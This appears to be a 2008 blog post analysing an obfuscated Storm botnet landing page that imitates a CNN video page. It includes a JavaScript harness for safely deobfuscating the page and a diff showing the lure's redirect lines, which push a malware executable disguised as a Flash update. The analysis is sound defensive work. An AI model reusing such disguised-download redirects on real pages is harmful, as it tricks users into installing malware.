Storm botnet landing page - Obfuscated CNN splash page

This obfuscated page has been all the rage since August 7 (it replaced the non-obfuscated CNN page). It would appear that it has been replaced by a new non-obfuscated version including a popup with a fake virus scanner, as of August 11th.

After the replacement, they went back and rewrote many of the hijacked servers with this version, so that this page and the original faux-CNN page look interleaved.

As always, the original file can be seen in the archived page viewer.

I used my monkeywrench tool on this -- that sounds pretty cool until you realize that the tool is mostly vapor. All it really means is that I'm collecting some tricks into a Perl script so I don't have to remember them every time there's something to deobfuscate. (And eventually, the idea is to be able to get to those tools online, but right now it's command-line and duct tape all the way.)

If you unpack that script into an environment that can run it, and pretty-print the JavaScript to get a better idea of what it's doing, you get this:

// Monkeywrench run Thu Aug  7 18:57:24 2008
// -----------------------------------------------
// Set up a document object
// -----------------------------------------------
function my_location() {
   this.href = "";
}
function my_document() {
   this.location = new my_location();
   this.url = "";

   this.write = function(string) {
      print(string);
   }
};
function my_window() {
   this.something = '';
}

function eval(something) {
   print(something);
}

var document = new my_document();
var location = new my_location();
var window = new my_window();

var U7 = window,
W8 = document;
var a1 = "%20%3C%21DOCTYPE%20HTML%20 [snip snip] /html%3E%0A";
function V0() {
   var V0;
   V0 = unescape(a1);
   W8.write(V0);
}
V0();

If you run that JavaScript, you get almost exactly yesterday's page, but not quite; running diff between this output and yesterday's page gives this:

11c11
< <title>Video - Breaking News Videos from CNN.com</title>
---
> <title>Breaking News Videos from CNN.com</title>
51c51
<               window.setTimeout("location.href='get_flash_update.exe'", 3000);
---
>               window.setTimeout("location.href='adobe_flash.exe'", 3000);
186c186
<         case "iax": document.location.href="get_flash_update.exe"; break;
---
>         case "iax": document.location.href="adobe_flash.exe"; break;
194c194
<               location.href="get_flash_update.exe";
---
>               location.href="adobe_flash.exe";
514c514
< <a href="get_flash_update.exe">
---
> <a href="adobe_flash.exe">

They've changed the title, which is uninteresting. But they've changed the name of the executable. And my guess is they've obfuscated the page to slow down efforts to detect that change.

I don't have any real tools (or time) to investigate binary files, but I have just now retrieved these two binaries myself from infected servers, and they have the same length, but different content. I can provide the files in question upon request.

Copyright © 1996-2008 Vivtek. All Rights Reserved.